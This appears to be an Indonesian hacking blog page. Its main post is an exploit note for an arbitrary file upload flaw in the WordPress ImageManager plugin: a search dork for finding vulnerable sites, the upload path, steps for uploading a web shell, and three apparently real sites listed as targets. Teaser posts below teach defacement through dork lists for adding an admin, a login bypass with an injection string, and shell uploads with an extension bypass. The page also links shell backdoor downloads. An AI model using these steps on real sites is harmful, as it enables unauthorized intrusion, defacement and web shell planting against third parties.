WordPress Plugins ImageManager- Arbitrary File Upload

-

Vulnerability Ig : mrkronkz SHELL BACKDOOR bisa download DISINI atau DISINI ======================================================================== # Exploit Title: WordPress Plugins ImageManager- Arbitrary File Upload
# Date: 05/11/2017
# Exploit Author: j!h4dDZ 

# Tested on: Windows 7 ======================================================================== 1)cari di google dengan dork inurl:wp-content/plugins/ImageManager/manager.php atau index of wp-content/plugins/ImageManager/manager.php

2)Exploit File Upload  (PoC) http://localhost/wp-content/plugins/ImageManager/manager.php

 3)terus upload shell atau gambar di sini
4)Location File : http://localhost/wp-content/uploads/.thumbs/.FILE.jpg 
======================================================================== 
http://www.lesnap.com/wp-content/plugins/ImageManager/manager.php http://www.magicrelationship.net/blog/wp-content/plugins/ImageManager/manager.php http://www.trejosolutions.com/blog/wp-content/plugins/ImageManager/manager.php
========================================================================

Komentar

Posting Komentar

Postingan populer dari blog ini

tips menjadi hacker

-
Gambar
hallo kawan,,, kembali lagi bertemu dengan saya di postingan yg mungkin gk bermanfaat hehehe,, postingan kali ini ane mau berbagi tips,pengalaman,dan cerita ane,, ane ada sedikit cerita,ini tentang ane dan salah satu temen ane, ini cerita buat pelajaran saja, ok ane di kls punya temen yg niat banget belajar hacking,dan minta ane ngajarin dia,memang ane pertaman nya seneng bisa berbagi ilmu walau cuma hacking,tp ane lama lama capek juga,,bukan nya capek badan tp capek batin, ane capek batin karna pas ane ajarin dia itu susah nyantol nya walau udah dikasih akses nya tinggal eksekusi aja gk biasa,udah di kasih tutor masih mbulet(ribet),tp ane bingung mau ngapain,,dan ane juga punya kesibukan sendiri,tp dia mau ya di suapin aja,,jadi pusing,, nah dari cerita tadi ane mau kasih tips pada kalian buat jadi hacker,, dan ingat PARA MASTAH.PRO,DLL bukan nya sombong atau apa kalo di mintai ngajarin, tp mereka mengajar kita dengan cara hanya memberi bahan,cara, dan sisa n
Baca selengkapnya

deface metode ADD ADMIN WORDPRESS 2018

-
Gambar
hello bro,,,,udah lama gk share di blog ini,malam ini ane mau share cara deface add admin wordpress. gak usah banyak cingcong,langsung aja siapin bahan nya +++++++++++++++++++++++++++++++++++++++++++++++++++ bahan nya : 1) dork nya :  inurl:/wp-content/themes/appius/   inurl:/wp-content/themes/Consultant/  inurl:/wp-content/themes/appius1/  inurl:/wp-content/themes/archin/   inurl:/wp-content/themes/averin/  inurl:/wp-content/themes/dagda/  inurl:/wp-content/themes/echea/  inurl:/wp-content/themes/felici/  inurl:/wp-content/themes/GantiDengantema/  inurl:/wp-content/themes/kmp/   inurl:/wp-content/themes/kmp2/  inurl:/wp-content/themes/themanya/  inurl:/wp-content/themes/liberal/  inurl:/wp-content/themes/liberal-media-bias/  inurl:/wp-content/themes/linguini/  inurl:/wp-content/themes/livewire/  inurl:/wp-content/themes/majestics/  inurl:/wp-content/themes/mathis/  inurl:/wp-content/themes/mazine/  inurl:/wp-content/themes/Orchestra/
Baca selengkapnya

deface dengan bypass admin

-
Gambar
assalamualaikum wr.wb semoga kalian sehat semua ya kawan ku semua nya kali ini saya akan kasih tutorial deface dengan bypass admin tanpa banyak kata langsung aja kita ke materi nya cap cuzzzz.....😀😀 bahan: 1) dork: inurl:alogin.php intext:username+password 2) shell backdoor yang ringan bisa download di SINI 3)sc deface nya jangan lupa ya tutor nya 1) pertama kita cari di google dengan dork di atas 2)klo udah ketemu masuk kan username+pass nya dengan  '=' 'or' terus login 3) kita cari tempat upload nya,biasa nya ada di gallery,dockumen,dll nah kalo ane ini sebagai contoh ada di dockumen *)catatan kalo gk bisa upload php,kita bypass extensi nya ok lalu kita pilih edit 4) kita upload shell nya yg tadi download 5) kita akses shell nya,kalo kita upload nya di image/gallery kita view image klo ini yg sebagai contoh kita pilih view details *)kita lihat link pojok bawah itu (admin gk tau kiri kanan,harap maklum :\___
Baca selengkapnya